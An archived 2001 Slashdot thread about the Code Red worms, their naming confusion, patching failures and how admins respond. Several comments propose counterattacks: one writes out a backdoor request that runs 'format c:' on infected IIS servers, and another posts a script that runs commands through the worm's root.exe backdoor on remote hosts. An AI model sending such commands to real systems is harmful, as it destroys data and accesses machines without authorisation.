Forgot your password?
typodupeerror
Microsoft

Code Red III 759

Posted by CmdrTaco
from the are-we-there-yet-mommy dept.
drcrja was the first to send us this brief bit about Code Red III which is apparently faster and more vicious than its entertaining predecessors. I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log trying hopelessly to overflow my buffer.
This discussion has been archived. No new comments can be posted.

Code Red III

Comments Filter:
  • How is it that all this time after Code Red first hit the news, so many machine still remain unpatched ? Are the Koreans being disproportionately affected, or is it having major impact over here too ? And if the Koreans are being disproportionately affected, why ? Is press coverage of the virus less prevalent over there ? Could it be something as silly as Koreans not being as adept at the English language ?

    And how can the Koreans as sysadmins be so bad, when Koreans in Age of Empires: The Conquerors are so good ? Maybe the Persians and Turks are being hit badly by Code Red as well ?

  • by Moonshadow (84117) on Friday August 10, 2001 @02:18PM (#2111342) Homepage
    Code Red: A New Worm
    Code Red: Microsoft Strikes Back
    Code Red: Return of the Virii
    Code Red: The Not-so Phantom Menace

    And finally...

    Code Red: Attack of the Clones
  • It occurs to me...

    Let's say you read /.. And let's say you're a Linux zealot. but I repeat myself. ;-)

    I've seen the sentiment expressed here before that the only way to drive into the world's consciousness that MS make shoddy products is for a massive vulnerability to hit everyone really badly. For a large number of people to lose data because of a major flaw in an MS product.

    Now I see speculation of CR IV (or whatever number version you want to call it) that collects IP addresses of CR II compromised machines from all attempts on its own machine and uses the root script to run "format c:" on each of them. It doesn't exist yet... but will it? I'm sure. Probably even before CRI goes dormant next weekend.

    This looks suspiciously like what an unscrupulous /. Linux zealot might wish for in their wildest dreams. I don't necessarily think the original CR was written by one, but I wouldn't be surprised if the more virulant strains were/are/will be.

    If you're reading this and you're thinking about this is a suggestion, please don't. Lost or corrupt data is a scourge. The tech industry is having enough problems right now as it is without needing to deal with massive data loss. MS's PR so far has been doing an admirable job of damage control, but the last few mainstream articles I've read have stopped referring to it as an Internet problem and started referring to it as an IIS problem. Sufficient damage has already been done to MS. Don't make the situation any worse.

    [TMB]
  • by QwkHyenA (207573) on Friday August 10, 2001 @01:52PM (#2115668) Homepage
    Hopefully Code Red IV, when it rolls out next week, will just cut the dang servers OFF

  • More information? (Score:5, Interesting)

    by Dr. Evil (3501) on Friday August 10, 2001 @01:52PM (#2115669)

    I've heard all sorts of rumours about this thing. Now whenever I hear people talk about "Code Red III", I give up asking them what it is. It doesn't exist. If it does, it is about time.

    The media seems to think that Code Red 1 was July 19, Code Red 2 was Aug 1, Code Red 3 is the one with the back door. In otherwords, they're only figuring out now how bad Code Red II is.

    • Re:More information? (Score:4, Informative)

      by pi_rules (123171) on Friday August 10, 2001 @02:02PM (#2130407)
      There were/are three versions actually. Incarnations 1 and 2 had the same purpose though. CRv1a (I think that's the accepted name) had a rather dumb random number generator. CRv1b had a much more targeted random number generator. CRv1a and CRv1b were very close in code though. The code for v1b was in v1a, but wasn't activated. The author had it just jump over the not-yet-wanted portions. You can spot a CRv1 attempt because it uses N's to fill up the buffer.

      CRv2 on the other hand (which is technically the 3rd release, but the first two did almost the same thing) fills up the buffer using X's and then opens the backdoor, sets up root.exe in the scripts/ mapping, etc. Totally different codebase from what I gather.

      In all likely hood the media is confused. It wouldn't be the first time. I figure if there's a CRv3 ever out there it won't be near as nice as v2 is. I'm thinking massive damanage upon infection to the machine... but not enough to keep the worm from spreading.

      Justin Buist
      • by blakestah (91866) <blakestah@gmail.com> on Friday August 10, 2001 @02:29PM (#2128819) Homepage
        In all likely hood the media is confused. It wouldn't be the first time. I figure if there's a CRv3 ever out there it won't be near as nice as v2 is. I'm thinking massive damanage upon infection to the machine... but not enough to keep the worm from spreading.


        What they are calling CodeRed III is really CodeRedII with a better IP selection routine.
        Still has the XXX and installs the backdoor

        Now incidents.org is recommending that the compromised machines, which have installed backdoors, format their c drive and reinstall

        We can do it for them...

        GET /script/root.exe?+%2fc+format+c:
        • Don't forget the "echo Y" pipe trick :-)
          I don't know if that still works under NT though, fortunately no NT machine available to test it...

        • by BigBlockMopar (191202) on Friday August 10, 2001 @02:57PM (#2153516) Homepage

          We can do it for them...
          GET /script/root.exe?+%2fc+format+c:

          Okay. So, I'll put up a disclaimer on www.glowingplate.com that any connection attempts by machines infected with Code Red will be met with an HTTP request to $HOSTNAME/script/root.exe?+%2fc+format+c.

          Set up Lynx into a little script, log the confirmed kills to my log printer, and all is good legally because of the disclaimer. One would hope.

          • Re:More information? (Score:5, Informative)

            by ncc74656 (45571) <scott@alfter.us> on Friday August 10, 2001 @03:49PM (#2117423) Homepage Journal
            Okay. So, I'll put up a disclaimer on www.glowingplate.com that any connection attempts by machines infected with Code Red will be met with an HTTP request to $HOSTNAME/script/root.exe?+%2fc+format+c.

            Set up Lynx into a little script, log the confirmed kills to my log printer, and all is good legally because of the disclaimer. One would hope.

            That's probably a little further than the law will allow...but you could throw up a popup on infected systems. That'll let the admins on the other end know they have a problem. You can even include some simple help.

            I threw together a script a few nights ago that sends such a popup to every CodeRed2-infected server that's contacted my server. It's available at http://salfter.dyndns.org/codered.shtml [dyndns.org] if anyone's interested. I also have live log info available there...got only about two dozen hits from the original CodeRed, but CodeRed2 is at 3500 hits and climbing.

            Since the list is fairly lengthy at this point, let's see if I can sneak the script past the lameness filter:

            #!/bin/sh
            http_proxy=
            for i in `(echo use apache2 ; echo 'select host.host from transfer inner join\
            host on host.id=transfer.hostid where requestid=2058 and transfer.time>"2001-0\
            7-31";' ) | mysql | sort | uniq | grep -v ^host\$`
            do
            echo -n Sending Code Red message to $i...
            result=`ping -c 1 -w 3 $i | grep "100% packet loss"`
            if [ -n "$result" ]
            then
            ec ho host is down.
            else
            ly nx -dump http://$i/scripts/root.exe\?/c+net+send+localhost+ %22Your+w\
            eb server+has+been+infected+with+the+CodeRed2+worm.+Y ou+have+a+security\
            +h ole+so+big+that+you+can+drive+a+Mack+truck+through +it.+You+should+fi\
            x+ it+before+some+script+kiddie+comes+along+and+takes +advantage+of+it.+\
            +R emove+root.exe+and+shell.exe+from+c:%5Cinetpub%5Cs cripts+\(or+wherev\
            er +your+CGI+scripts+live,+though+c:%5Cinetpub%5Cscri pts+is+the+default\
            +l ocation\).%22 >/dev/null
            ec ho message sent.
            fi
            done

            Damn...looks like the lameness filter didn't throttle it, but some extra spaces got thrown in. The spaces that need to be removed are fairly obvious, though.

            • Re:More information? (Score:3, Informative)

              by helleman (62840)
              Modified version to grep standard apache log Change the top to be the following: file:#!/bin/sh for i in `(grep default /var/log/httpd/access_log | cut -f1 -d- | sort | uniq )` do=
    • by ryanr (30917) <ryan@thievco.com> on Friday August 10, 2001 @03:05PM (#2147115) Homepage Journal
      The name Code Red came from Marc and Ryan at eEye. When the version of the original Code Red with the "improved" random number generator came out, they named the new variant CRv2, and re-named the first one CRv1. When we found the one that leaves the back doors, inside is the string "CodeRedII", which is used as an atom name. The author named that one himself.

      Other people keep referring to CodeRed III, or CodeRed3. I *think* they are all talking about CodeRed II. We have yet to verify any fourth version.

      For people who are asking in other threads here, CRv1 and CRv2 uses NNNNNNNN's in their URL. CodeRed II uses XXXXXXXXXX's.

      Honestly, if we can keep PacMan, Ms. PacMan, PacMan Jr., PacLand, and SuperPacMan distinct, why not the Code Red names?

      In any case, if someone is able to translate
      this link [mic.go.kr]
      That would be a huge help.
    • by Nate Fox (1271) on Friday August 10, 2001 @02:00PM (#2156844)
      According to Symantec's page [sarc.com] on CR2:

      Also Known As: CodeRed.v3, CodeRed.C, CodeRed III, W32.Bady.C
  • Code Red III which is apparently faster and more vicious than its entertaining predecessors.

    I've always suspected that Code Red was secretly made by Microsoft's Marketing department to convince users to upgrade to the very latest products (and to grab XP as soon as it becomes available). That it's taken three versions to make Code Red work well is the proof!
  • by Rob Mac K (513824) on Friday August 10, 2001 @01:57PM (#2116710) Homepage
    I know the reaction to a suggestion that someone create a worm that "fixes" the effects of the various CR worms provoked a highly negative response, but I wonder if the right thing to do to protect against the worm (actually, against all the morons still running these unpatched servers) would be to log an "attacking" IP, then "counterattack" by executing a command on those servers to shut them down, so they'd quit trying to infect everything in sight? I mean, geez, I know it's probably ethically (and legally) wrong to exploit the back doors, even if it's just to shut down the servers, but wouldn't that be better than sitting around doing nothing? (Since the various ISPs don't seem to be doing anything other than sending out e-mail - at this point, ignorance can't be an excuse for anyone still running an unpatched server).

    Thoughts?

    • I know the reaction to a suggestion that someone create a worm that "fixes" the effects of the various CR worms provoked a highly negative response

      I would have agreed with you, and there was a debate about it in one of the earlier articles, but it seems that @home has no problems with that type of behavior. I found this interesting gem in my server logs last night:

      2001-08-09 04:08:11 24.0.0.203 - me.me.me.me 80 GET /c/winnt/system32/cmd.exe /c+VER 404 -

      At first I thought it was just another leet script kiddie, tap, tapping at my ports, but the originating address struck me as interesting, so I did a quick nslookup:

      Name: authorized-scan1.security.home.net
      Address: 24.0.0.203

      Authorized Scan?!? By whom?!? I don't recall the TOS mentioning anything about my ISP being authorized should they want to try rooting me...

      I calmed down, thinking maybe it was just a one time scan, to see who was infected, but it has since popped up a few more times. And what's more, they certainly don't seem to have been very effective in doing anything, as I'm still being flooded as much as before.

      (And yes, I realize this is not the exact same thing described by the parent, but it was similar, and reminded me about it, getting me fired up again.)

      -Tommy

    • I have been seriously considering the "counterattach" method for a while now (as opposed to a self replicating anti-virus, which I am firmly opposed to).

      I guess part of the problem is you have to install not only the patch, but a service pack, and people who seem to know something about windows think that is hard to do remotely.

      Here is another thought: Just write a counter strike that A) deletes code red and the back doors B) turns off IIS and disables it from starting at boot, and C) changes the homepage to something that says "Please install these patches, your system has been infected by Code Red."

      This is based on the assumption that 99% of the people who haven't patched their webservers don't use them and have forgotten (or never knew) IIS was installed.
  • I think that a large proportion of the infected machines are the desktops of users who just installed IIS along with the rest of everything because they didn't know what they needed and what they didn't. These are boxes that don't have systems admins to patch them. I'll bet that half of these people don't even know that they have IIS installed and if they do, they don't realize that they're infected since they're files are all still there and the virus hasn't popped up a HUGE message on their screen saying "YOU ARE INFECTED".
  • It keeps popping up these annoying ads every time I visit a web site, and leaving them under the browser window, so I have to close each one.

    None of my antivirus software packages seem to be able to detect it, though ...
  • by I_redwolf (51890) on Friday August 10, 2001 @01:57PM (#2119502) Homepage Journal
    and start addressing the primary issue at hand. The issue is system administrators need to take proactive measures to make sure their systems have been patched. That's the problem and thats what needs to be addressed. There is nothing significantly fascinating about this program that deserves any noteriarty. It didn't find some weird flaw in design. It just exploits a buffer overflow which has always been a problem in peoples code. It's a really simple thing to fix at that. Enough about Code Red and more about the underlying problem.
  • by wiredog (43288) on Friday August 10, 2001 @02:09PM (#2120746) Journal
    From The Register [theregister.co.uk]
  • The newsmakers love it because they get to print lots of muckracking headlines about "another hacker threat," and the "evil red chinese attack on the good guys." A scary computer virus means ratings!

    Microsoft loves it because they get to release patches, and proclaim to the world "we're the good guys, protecting you from those unamerican people who share code!"

    The lawmakers get shits and giggles because now they have a reason to pass new, more restrictive laws regarding comminication across "the information superhighway."

    The prison system salivates over this sort of stuff. It creates more potential for 15 year old kids to be thrown in prison for essentially victomless crimes. Nothing like young ass for the seasoned prison rapists!

    Open source fanatics get another nit to pick with big bad Microsoft. Go free software! No, go open source! No, go free software!

    News like this is the best kind around.

  • by snakecoder (235259) on Friday August 10, 2001 @02:54PM (#2121499)
    God, I'm still on version 1 of code red. Does anybody know where I can download the latest version? Is there a mail list I can get on so I know I have the lasted version on my IIS server?
    Tnks.
  • by isn't my name (514234) <slash.threenorth@com> on Friday August 10, 2001 @03:25PM (#2124842)
    Tom Liston came up with a cool idea for slowing Code Red and other TCP port scanners. He didn't have the bandwidth to host it, and I offered. So, this is a shameless plug, but if we can get enough of us doing this and get some press coverage, it's a great story that shows the power and speed with which open source solutions can be implemented. He first posted the idea on 7/31 just before Code Red started heating up again. Using the Trinux (http://www.thrinux.org) linux distribution, he cobbled together a floppy boot image that, with unused ip addresses and an old machine, can be used to slow the scans by responding to the initial TCP three way handshake and then ignoring everything else. The automated scanner has to time out before that thread can move on. According to reports on the SANS Intrusions discussion list, it seems to slow all variants of Code Red and on RPC scans as well. His announcement of LaBrea is at: http://www.incidents.org/archives/intrusions/msg01 368.html
  • by pmorrison (513514) on Friday August 10, 2001 @02:04PM (#2125781)
    It usually takes Microsoft 3 releases to get it right. So, when can we expect Code Red .Net?
  • by Todd Knarr (15451) on Friday August 10, 2001 @01:56PM (#2129034) Homepage

    My suspicion is this is Code Red 2. One of the AV companies used "CodeRed.v3" or something similar to refer to Code Red 2, and I'd bet the journalists were just too clueless to figure out that the two names refer to the same thing.

  • by Slur (61510) on Friday August 10, 2001 @05:39PM (#2130305) Homepage Journal
    Hi,

    I've been watching my Apache log as I get hit about every 10 minutes by Code Red. For each source IP address I've been doing a reverse lookup and if successful then notifying the webmaster of the source domain about the infected computer on their network.

    I'd like to automate this process and generate a "form" email, filling in the relevant details, but I'm not sure how to cause a script to be invoked by a change in the Apache log, except to maybe run a 5 minute cron job that grabs all the Code Red attacks and then renames the log file.

    An example of the email I've been sending is this:

    Hi,

    Just a note to let you know that a copy of the Code Red virus is on your network attacking my web server. The source IP address is: 207.151.xxx.xxx which a reverse lookup shows as xxx.xxx.gdsl.nwc.net . If this is a customer on your network then please pass on to that individual that they need to reboot their NT/W2K server and possibly reinstall their OS. They will also need to get a patch from Microsoft to correct this vulnerability.


    This is probably a very miniscule thing to do, but it does - in a way - inoculate against the virus, at least on consumer DSL networks, and in a manner that is both ethical and - like a virus - fairly contagious. I've heard a lot of buzz in places like Slashdot about making an "anti-virus" but why haven't I heard this kind of thing suggested before?
    • by nitehorse (58425) <clee@c133.org> on Friday August 10, 2001 @07:08PM (#2116932)
      Actually, if you add a line in your httpd.conf that looks like this:

      AddHandler cgi-script .ida

      then you can use Perl to write a quick script which will do the reverse lookup and then send that email. Or, if you want to use PHP instead, alter your AddType line for PHP to this:

      AddType application/x-httpd-php .php .php3 .ida

      Then restart apache, and throw a script named default.ida up to your DocumentRoot directory.

      -Chris
  • by Sloppy (14984) on Friday August 10, 2001 @01:54PM (#2136357) Homepage Journal
    Here we have something that does not come with source code, but people are still able to maintain the program, improve its performance, and then get those improvements quickly out into the field. Even Linux updates don't get distributed this efficiently.

    • Hehe.

      I'm waiting for one which sends digitally-signed updates to hosts (like hybris did off usenet) for upgrade capabilities. From what I understand, CR2 was not directly based on CR1's code (though it's easy enough to disassemble the executable that it sends your web server...)
  • by GC (19160) <giles@coochey.net> on Friday August 10, 2001 @01:53PM (#2137133)
    but I have not seen any instances of attempted infection.

    It's all very vague and the chances of mistaking Code Red rev C as Code Red III, (rev C = version II) are simply too high.

    I also assume that this takes advantage of the same Index Vulnerability in IIS, which if anyone has been hit by either of the first two versions then they will have minimised the risks of a new version which uses the same vulnerability.

  • by SethJohnson (112166) on Friday August 10, 2001 @01:53PM (#2137134) Homepage Journal


    Taco, I recommend you sign up with one of those online casino sites and host banner ads on your server with the file name of /default.ida. You should be able to rack up a few thousand unique page views a day by pointing the scourge at the scourge (ala Fist Full of Dollars).
  • by Rosco P. Coltrane (209368) on Friday August 10, 2001 @02:06PM (#2146510)
    Why do poor bastards get sued [slashdot.org] for using a little bandwidth to participate in an interesting project while Microsoft gets away with releasing shoddy products that slow down the entire Internet ?

    I know gun manufacturers shouldn't be sued when someone commits a crime with a firearm, and in that case the people who created the lame Code Red virii should be sued primarily, but I still think Microsoft is guilty here because their customers weren't aware their Windows-running boxes could start chewing up bandwidth like crazy simply because the OS vendor doesn't give a damn about these things.

    To my knowledge, Microsoft didn't even try to mass-mail the patch to their registered customers who might be affected. Therefore, at the very least, I reckon they should be ordered to pay damages to telcos and ISPs for lack of due diligence.

    (of course, in Georgia, I'd also be happy to see the state sue them for 59c per second of wasted bandwidth as well :-)

    • The big problem with sending out the patch to "Registered" users is this - I'll give high odds that MOST copies of NT/Win2K running at home are pirate copies. Ditto the copies running in China - Between the 2, you are talking about the majority of the still infected boxes out there
    • Why do poor bastards get sued for using a little bandwidth to participate in an interesting project while Microsoft gets away with releasing shoddy products that slow down the entire Internet ?

      THERE WAS a patch AVAILABLE *BEFORE* that virus got mainstream.

      Why should microsoft get sued for having stupid users?

      It's not like Linux didn't have any opened holes ever. You have to patch your linux? people have to patch their windows. Period. This virus is spreading like flu, not BECAUSE of microsoft, but because of INCOMPETENCE and cluelessness...

      I mean, one simple patch, poof! no more problems. Why the heck do I still see my cable modem light flash like hell even after a WEEK that everyone knows about this thing?

      See? that's a *&#@*(@& good argument for microsoft to tell the people "don't install non-certified drivers" "don't install non-ms-approved software" "don't do this and that"... people need to be wiped and taken by the hand to be shown what to do. This virus is the greatest proof that the world is full of clueless people and that's why some people won't care if their OS babysits them.

      BTW, I don't like the idea of microsoft controlling everything (nor any other companies), I just say this will give them bullets to automate the patching/drivers things without your knowledge (and of course adding a couple of "justified" intrusive programs as well) Tech people always have to pay because of non-tech people, it always been like that... just like we have to pay high insurance rates because people have abused it and gave ammos to the insurance companies to f* us.

      I'm so fucking tired of this virus.... where's the big reset switch of the internet? :)
    • As you must know, their own license agreement says they cannot be sued for their software, and that all you have really bought is a funny-looking silver coaster and a piece of paper or two.

      This industry as a whole is a castle of sand with the tide rapidly coming in, but nobody cares to admit it.

      D
    • To my knowledge, Microsoft didn't even try to mass-mail the patch to their registered customers who might be affected.

      From: Support@iis.microsoft.com
      To: Registered_Users@iis.microsoft.com
      CC:
      Subject: RE: IIS Code Red Worm Patch
      Attachment: Instructions.doc
      Body:

      Hi, how are you?

      We are writing you in response to the Code Red worm that has recently attacked our premium enterprise gold standard web portal system, Microsoft Internet Information Server. We have compiled a set of directions for patching the server, and have included these instructionsin a easy to read Word document. If MS Outlook didn't automagically open this attachment for you, double click on the attachment link above.

      If you have any advice on this file, please email us back!

      See you later!

    • I'm a gun nut, but even I will say that a maker of a defective gun should be liable. If it explodes in your hand, that's an issue. IIS is exploding in a way, and MS should be liable.

      My view is very simple: Things you buy shouldn't suck.
    • ...I still think Microsoft is guilty here because their customers weren't aware their Windows-running boxes could start chewing up bandwidth...
      If you are a sysadmin responsible for any server, regardless of operating system, it's your job to be aware. Microsoft's poor record may drive up the frequency of patches, but that doesn't change the fact that the difference between a good sysadmin and a bad one is the knowledge that no server runs itself.
      • And what do you do if your server runs third-party software that can't run with Service Pack 6?

        Microsoft unfortunately has chosen to integrate IIS so tightly with the operating system, that to upgrade one is to upgrade the other.

        Some folks are in a real pickle, and don't have the knowledge to get out of it in a short period of time.
    • by mblase (200735) on Friday August 10, 2001 @02:24PM (#2125790)
      Remember the recent Ford Explorer/Firestone fiasco? Firestone made a bunch of flawed tires (when and where is not important here) that were put on these Explorer SUVs, which in some cases fell apart and came off the wheel when driving at high speeds. Investigations were made, and eventually Firestone had to issue a complete recall of the tires.

      The media talked about it for weeks. Ford sent out letters to customers as far as they could find them. People brought their SUVs in, got new tires put on them, drove out. That's how product recalls usually go.

      Software patches aren't all that different. When a hole is discovered, a patch is made. Responsible Microsoft server administrators have the MS site automatically checked on a daily basis for critical updates and patches. Irresponsible admins don't bother, and they become vulnerable and the cause of the worm's spread.

      But it would be insane to propose MS should force-feed this server patch to all their customers. The problem isn't the software, it's the admins. You'd be hard-pressed to find a major newspaper in the civilized world that hasn't mentioned this worm yet, and still there are people who don't bother to patch. They're the same ones who think that server software is just like desktop software, where you're the only one who uses it that really matters.

      Firestone couldn't make its customers bring their SUVs in to have the tires replaced for free, and there's no way the customers could claim ignorance of the problem after the press got done with it. Likewise, Microsoft can't make its customers upgrade their software for free. They've honestly tried to make all their server customers aware of what's expected of them, but they're as powerless to force it to happen as Firestone is to force car drivers to rotate their tires every 6,000 miles.

      • A couple things-
        -Microsoft didn't even update their own webservers completely - windowsupdate and hotmail were both hit by the "Hacked by Chinese" varient, so how do they expect their customers to update? Their response that the customers are at fault is ludicrous in light of this.
        -The patches issued by MS are not at all easy to apply. I've talked to people who have Windows 2000 with the latest service pack, go to the update site and are told they have to have an older service pack version to get the patch.
  • Finally (Score:5, Funny)

    by nEoN nOoDlE (27594) on Friday August 10, 2001 @01:50PM (#2146696) Homepage
    Sequels that are actually better than the original.

    • by Hammer (14284) on Friday August 10, 2001 @02:24PM (#2125787) Journal
      That Linux and Apache are not compatible.
      We seem to have a good ways to go befoer everything that runs on Winblows will also run on Linux :-))
  • by Malc (1751) on Friday August 10, 2001 @02:34PM (#2156651)
    "I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log trying hopelessly to overflow my buffer. "

    I'm not even sure how to spell regexe, but this is what I've attempted to do:

    SetEnvIf Request_URI /(.*default.ida.*$) code-red-request
    CustomLog /var/log/apache/code-red-request.log common env=code-red-request
    #CustomLog /var/log/apache/access.log common
    CustomLog /var/log/apache/access.log common env=!code-red-request

    RedirectMatch Permanent /(.*default.ida.*$) http://127.0.0.1/$1
  • by Naerbnic (123002) on Friday August 10, 2001 @02:00PM (#2156686)
    So, Three Code Reds and a SirCam later, the question just begs to be asked:

    Who's calling Whose code "Potentially Viral"?

Why do we want intelligent terminals when there are so many stupid users?

Working...